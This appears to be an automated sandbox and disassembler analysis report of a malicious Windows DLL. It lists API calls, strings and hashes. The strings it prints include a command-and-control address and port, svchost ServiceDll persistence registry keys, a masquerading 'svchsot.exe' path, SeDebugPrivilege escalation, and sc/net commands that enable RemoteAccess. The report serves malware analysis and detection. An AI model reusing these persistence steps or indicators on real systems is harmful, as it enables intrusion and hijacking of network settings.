                                      • InterlockedDecrement.KERNEL32(00000008), ref: 10006668
                                      • _strcmpi.MSVCRT ref: 10006685
                                      • 6D262DD0.MFC42(0000000C), ref: 100066B4
                                      • SysAllocString.OLEAUT32(654E5F32), ref: 100066DC
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 10006789
                                      • StrStrIA.SHLWAPI(1001A364,svchost.exe -k NetworkService), ref: 100067A9
                                      • VariantClear.OLEAUT32(ultIPGateway), ref: 100067D2
                                      • VariantClear.OLEAUT32(SetGateways), ref: 100067D9
                                      • CoUninitialize.OLE32 ref: 10006803
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262Variant$AllocString$Init$ClearDecrementInitializeInterlocked$BlanketCreateInstanceProxySecurityUninitialize_strcmpiwcscat
                                      • String ID: CommandLine$Name$ProcessID$SELECT * FROM $SetGateways$WQL$flushdns$svchost.exe$svchost.exe -k NetworkService$tworkAdapterConfiguration.Index=$ultIPGateway$wayCostMetric
                                      • API String ID: 2874424801-756481962
                                      • Opcode ID: 1bb00c3f93f4a7b639d82edecc7658e22878ec0fd9d7bca1c454a458c29ec668
                                      • Instruction ID: 1f835a4d0faa9fc020e65b56cf2e9a4dfb5885ebfc35db84a98710ed097cd709
                                      • Opcode Fuzzy Hash: 1bb00c3f93f4a7b639d82edecc7658e22878ec0fd9d7bca1c454a458c29ec668
                                      • Instruction Fuzzy Hash: 8D02A2B1504345AFE720DF64CC80A9EB7E9FB88394F108A2DF5999B280DB71DD44CB92
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,772EC650,00000000), ref: 10008927
                                      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10008966
                                      • GetLastError.KERNEL32 ref: 10008970
                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10008984
                                      Strings
                                      • SYSTEM\CurrentControlSet\Services\%s, xrefs: 100089B7
                                      • %SystemRoot%\System32\svchost.exe -k , xrefs: 100088C5
                                      • RegSetValueEx(ServiceDll), xrefs: 10008A7F
                                      • RegSetValueEx(Svchost\krnlsrvc), xrefs: 10008B31
                                      • RegOpenKeyEx(Svchost), xrefs: 10008AF4
                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10008AAA
                                      • Description, xrefs: 100089EB
                                      • ServiceDll, xrefs: 10008A5D
                                      • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 10008A0D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: OpenService$CreateErrorLastManager
                                      • String ID: %SystemRoot%\System32\svchost.exe -k $Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                      • API String ID: 2857751478-660433390
                                      • Opcode ID: 7bee34f355b2868c88db09174060a769cc1a21acf3b1f20f2e0e65ce036f74e8
                                      • Instruction ID: 80a349a1c7f2a3681a728849bd2a1506b88036c9e14b74da46397a96899aa474
                                      • Opcode Fuzzy Hash: 7bee34f355b2868c88db09174060a769cc1a21acf3b1f20f2e0e65ce036f74e8
                                      • Instruction Fuzzy Hash: 4E9193B1A00218ABEB15DB64CC45BEE77A9FB88750F118259FA05E72C0DBB4DE40CB61
                                      APIs
                                      • 6D262DD0.MFC42(00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000,00000000), ref: 100068FA
                                      • 6D262DD0.MFC42(000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000), ref: 10006913
                                      • 6D262DD0.MFC42(00000000,000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000), ref: 1000692D
                                      • strrchr.MSVCRT ref: 1000693E
                                      • strncpy.MSVCRT ref: 10006955
                                      • strncpy.MSVCRT ref: 1000695F
                                      • GetSystemInfo.KERNEL32(GatewayCostMetric,?,?,?,?,?,?,00000000,10009DD0), ref: 10006969
                                      • GetCurrentProcess.KERNEL32(00000020,chOrder,?,?,?,?,?,?,00000000,10009DD0), ref: 1000698A
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,10009DD0), ref: 10006991
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,10009DD0), ref: 100069A2
                                      • AdjustTokenPrivileges.ADVAPI32(00000000,00000000), ref: 100069D7
                                      • CloseHandle.KERNEL32(44746553), ref: 100069E2
                                      • sscanf.MSVCRT ref: 10006A0D
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262$ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
                                      • String ID: %[^$C:\Users\user\Desktop$GatewayCostMetric$SeDebugPrivilege$chOrder$etc\hosts
                                      • API String ID: 1467661837-3828570706
                                      • Opcode ID: c6ea22cdf2f45c65aded0bf148d4135de5c60637ac9b3aef5171a31b4b18fe73
                                      • Instruction ID: 8e8dcdebdd68835a8d22dd71999f00dbe430d832e2cb33c79149909b2ad15fb4
                                      • Opcode Fuzzy Hash: c6ea22cdf2f45c65aded0bf148d4135de5c60637ac9b3aef5171a31b4b18fe73
                                      • Instruction Fuzzy Hash: A1313BB4905321AFE310DF69CDC9A567BE8FB8E310F00851EFA4987261D7B9D485CB21
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /$T$U
                                      • API String ID: 0-733984016
                                      • Opcode ID: 26c6bb479a735e41787d1c855f490b5051d387b0f4123a6ad5da299e4ffc3d58
                                      • Instruction ID: 0af6b09eb13da6613914ca18b4293f2e930e745bf8d0b97389fd89aabda86cff
                                      • Opcode Fuzzy Hash: 26c6bb479a735e41787d1c855f490b5051d387b0f4123a6ad5da299e4ffc3d58
                                      • Instruction Fuzzy Hash: BC22DF357083858BD714CE2898906AFBBE1EFC5350F14492EF9C58B382DAB5D989C792
                                      APIs
                                      • FindFirstFileA.KERNEL32(?,?), ref: 10005AE3
                                      • wsprintfA.USER32 ref: 10005B25
                                      • FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 10005BCA
                                      • FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 10005BDD
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$.$\*.*
                                      • API String ID: 180737720-2210278135
                                      • Opcode ID: fd0c06f5e656c0ca6a1207c5c9b4d901a9358243d8fd2179b47a31ede6763e51
                                      • Instruction ID: 41b8f4281efce6065b0411dfc6bcae962f58c9dcddea6dda85180880c775b3fd
                                      • Opcode Fuzzy Hash: fd0c06f5e656c0ca6a1207c5c9b4d901a9358243d8fd2179b47a31ede6763e51
                                      • Instruction Fuzzy Hash: BA41E5721083446BD329CA78DC44AABB7D9FBC8350F444F1DF59A93281DBB5EA08CB52
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Versionsprintf
                                      • String ID: 2000$2003$2008$Vista$Win %s SP%d
                                      • API String ID: 1728264858-2264339393
                                      • Opcode ID: 4f04bac56193650fc19eb336d9672af16f67b333fc106226f85362a7a82feba5
                                      • Instruction ID: 8d9624ca7b0e334ee449c93b415b4ae454ddf9d58a1d32c6b67a005c4f57db36
                                      • Opcode Fuzzy Hash: 4f04bac56193650fc19eb336d9672af16f67b333fc106226f85362a7a82feba5
                                      • Instruction Fuzzy Hash: D531D531A047445BE724C524C891A9BB7D6F7C4360F918A2DEE5AC7385DAB8DD098642
                                      APIs
                                      • GetLocalTime.KERNEL32(?,?), ref: 10010085
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 10010095
                                        • Part of subcall function 1000F760: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?), ref: 1000F76D
                                        • Part of subcall function 1000F730: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000F74C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 568878067-0
                                      • Opcode ID: ed7d6a687863316638af9b4b05be9f9b42821b15d02c911e347a352490ce8edc
                                      • Instruction ID: df2849aa1dc12c0f5487544b9b495675c1762f2cfe66b261c015e5e036936da4
                                      • Opcode Fuzzy Hash: ed7d6a687863316638af9b4b05be9f9b42821b15d02c911e347a352490ce8edc
                                      • Instruction Fuzzy Hash: 0821B2B5914B419FD364CF69C881A67BBE4FB88604F008E2EE5DAC3611E774E509CB52
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K$P
                                      • API String ID: 0-420285281
                                      • Opcode ID: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
                                      • Instruction ID: 98d1436c1d12383d330a33e8837fd7373f2bd8dcf5064c5ac92bb59d1160ce8b
                                      • Opcode Fuzzy Hash: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
                                      • Instruction Fuzzy Hash: 8AD18D30119381AFD621CB698CC0EABFBF9AFDAB00F444D0DF6D583291D6A1E5498762
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K$PTU
                                      • API String ID: 0-3860820754
                                      • Opcode ID: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
                                      • Instruction ID: b75c2c7393efce8f34ebcfbcfaf34b01291ef2e5bdad3d1dcf9c2601cb2aebd7
                                      • Opcode Fuzzy Hash: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
                                      • Instruction Fuzzy Hash: C791913011A3856EDB04DB688CC0E9BFBED9FD6704F04494EFA809B296D5E1D549CBB2
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,100079BE), ref: 100052FE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AdjustPrivilegesToken
                                      • String ID:
                                      • API String ID: 2874748243-0
                                      • Opcode ID: d54e74ece54ee20424641922b2b5810720bfc680afc0c90e10e7fcf085b7feb0
                                      • Instruction ID: 7c1a2bbd7757006d5c946c3e80e0d766e9fd4947b997df4eed36b7743c05efd3
                                      • Opcode Fuzzy Hash: d54e74ece54ee20424641922b2b5810720bfc680afc0c90e10e7fcf085b7feb0
                                      • Instruction Fuzzy Hash: 87D0BCB5618742AF9704CF58D994C3BB7EABBCC600F148D0CB59583254D730E849CB62
                                      APIs
                                      • ExitWindowsEx.USER32(?,00000000), ref: 1000516A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExitWindows
                                      • String ID:
                                      • API String ID: 1089080001-0
                                      • Opcode ID: f32a497f43df2c1907ad6a4c0e45c824a67bd738c1fb00097a1c7dc51b4314dc
                                      • Instruction ID: 3d1d98dc7dfc941cc0ac06cd550d9a2c3aa2a9b641fa0ba9a55bbc5b6fa54b5c
                                      • Opcode Fuzzy Hash: f32a497f43df2c1907ad6a4c0e45c824a67bd738c1fb00097a1c7dc51b4314dc
                                      • Instruction Fuzzy Hash: 3BB012B4204300BFDE04CB10CA88C2B77ECEBC4300F00880CF48A82110C638DC40CB11
                                       Memory Dump Source
                                       • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: bad d_code
                                      • API String ID: 0-2582332627
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      Strings
                                      • %s\%s, xrefs: 10006BEB
                                      • c:\windows\system32\drivers\%s, xrefs: 10006C5E
                                      • c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 10006D4F
                                      • c:\windows\system32\drivers\%s\%s, xrefs: 10006C77
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
                                      • String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
                                      • API String ID: 3377497938-1917988604
                                      APIs
                                      • wsprintfA.USER32 ref: 100072AE
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 100072C5
                                      • GetModuleFileNameA.KERNEL32(10000000,C:\Users\user\Desktop\NaRZIOq3O8.dll,00000104), ref: 100072D7
                                      • strrchr.MSVCRT ref: 10007305
                                      • wsprintfA.USER32 ref: 10007322
                                      • wsprintfA.USER32 ref: 10007333
                                      • wsprintfA.USER32 ref: 10007344
                                      • 6D262DD0.MFC42(00000084), ref: 1000734B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: wsprintf$FileModuleName$D262strrchr
                                      • String ID: %s\%s$%s\version.txt$107.163.241.193:6520$11121541$11121541$C:\Users\user\Desktop$C:\Users\user\Desktop\11121541$C:\Users\user\Desktop\NaRZIOq3O8.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB45F69E$M%s$M107.163.241.193:6520
                                      • API String ID: 2695514821-652825888
                                      APIs
                                      • StrStrIA.SHLWAPI(?,cmd.exe,774D0F00,?,00000000), ref: 10005706
                                      • GetCurrentProcessId.KERNEL32(?,00000000), ref: 10005729
                                        • Part of subcall function 10005460: CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000,?,00000000), ref: 10005522
                                        • Part of subcall function 10005460: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000), ref: 10005538
                                        • Part of subcall function 10005460: time.MSVCRT(00000000,?,00000000), ref: 1000553F
                                        • Part of subcall function 10005460: _localtime32.MSVCRT(?,?,00000000), ref: 1000554E
                                        • Part of subcall function 10005460: strftime.MSVCRT ref: 10005561
                                        • Part of subcall function 10005460: vsprintf.MSVCRT ref: 100055B3
                                        • Part of subcall function 10005460: sprintf.MSVCRT ref: 100055D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
                                      • String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
                                      • API String ID: 3192119092-4191049792
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: _mbsicmp
                                      • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                      • API String ID: 1961004622-51310709
                                      APIs
                                        • Part of subcall function 100068C0: 6D262DD0.MFC42(00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000,00000000), ref: 100068FA
                                        • Part of subcall function 100068C0: 6D262DD0.MFC42(000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000), ref: 10006913
                                        • Part of subcall function 100068C0: 6D262DD0.MFC42(00000000,000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000), ref: 1000692D
                                        • Part of subcall function 100068C0: strrchr.MSVCRT ref: 1000693E
                                        • Part of subcall function 100068C0: strncpy.MSVCRT ref: 10006955
                                        • Part of subcall function 100068C0: strncpy.MSVCRT ref: 1000695F
                                        • Part of subcall function 100068C0: GetSystemInfo.KERNEL32(GatewayCostMetric,?,?,?,?,?,?,00000000,10009DD0), ref: 10006969
                                        • Part of subcall function 100068C0: GetCurrentProcess.KERNEL32(00000020,chOrder,?,?,?,?,?,?,00000000,10009DD0), ref: 1000698A
                                        • Part of subcall function 100068C0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,10009DD0), ref: 10006991
                                        • Part of subcall function 100068C0: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,10009DD0), ref: 100069A2
                                        • Part of subcall function 100068C0: AdjustTokenPrivileges.ADVAPI32(00000000,00000000), ref: 100069D7
                                        • Part of subcall function 100068C0: CloseHandle.KERNEL32(44746553), ref: 100069E2
                                        • Part of subcall function 100068C0: sscanf.MSVCRT ref: 10006A0D
                                      • wsprintfA.USER32 ref: 10006F82
                                        • Part of subcall function 10006A20: strchr.MSVCRT ref: 10006A76
                                      • wsprintfA.USER32 ref: 10006FE8
                                      • wsprintfA.USER32 ref: 10007001
                                      • CreateDirectoryA.KERNEL32(PGateway,00000000), ref: 1000700C
                                        • Part of subcall function 100057F0: CreateFileA.KERNEL32(72656472,40000000,00000000,00000000,00000002,00000080,00000000,flushdns,77068400,10007027,file error,/flushdns), ref: 10005809
                                        • Part of subcall function 100057F0: WriteFile.KERNEL32(00000000,72657672,10019B1F,SearchOrder,00000000), ref: 1000582B
                                        • Part of subcall function 100057F0: CloseHandle.KERNEL32(00000000), ref: 10005832
                                        • Part of subcall function 10006240: CoInitializeEx.COMBASE(00000000,00000000), ref: 1000627D
                                        • Part of subcall function 10006240: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000628E
                                        • Part of subcall function 10006240: CoCreateInstance.COMBASE(Function_000141D0,00000000,00000001,10014100,10019B34), ref: 100062AE
                                        • Part of subcall function 10006240: 6D262DD0.MFC42(0000000C), ref: 100062BA
                                        • Part of subcall function 10006240: SysAllocString.OLEAUT32(?), ref: 100062E1
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000704A
                                      • CreateThread.KERNEL32(00000000,00000000,10006E10,00000000,00000000,00000000), ref: 10007071
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateD262$Processwsprintf$CloseFileHandleInitializeOpenTokenstrncpy$AdjustAllocCurrentDirectoryInfoInstanceLookupPrivilegePrivilegesSecurityStringSystemThreadValueWritesscanfstrchrstrrchr
                                      • String ID: %s\%s$/flushdns$PGateway$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$file error$sot.exe
                                      • API String ID: 4196162878-306053807
                                      APIs
                                      • RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 100086CB
                                      • _CxxThrowException.MSVCRT(?,10014468), ref: 100086E5
                                      • RegQueryValueExA.ADVAPI32(?,DLLPath,00000000,00000002,?,00000080), ref: 10008703
                                      • _CxxThrowException.MSVCRT(?,10014468), ref: 1000871D
                                      • StrStrIA.SHLWAPI(?,mp3), ref: 10008734
                                      • lstrlen.KERNEL32(?,00000000), ref: 10008743
                                      • RegCloseKey.ADVAPI32(?), ref: 10008782
                                      Strings
                                      • sc config RemoteAccess start= auto, xrefs: 1000876F
                                      • mp3, xrefs: 1000872E
                                      • DLLPath, xrefs: 100086FD, 1000874D
                                      • net start RemoteAccess, xrefs: 10008777
                                      • sc stop RemoteAccess, xrefs: 10008767
                                      • U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==, xrefs: 10008686
                                      Memory Dump Source
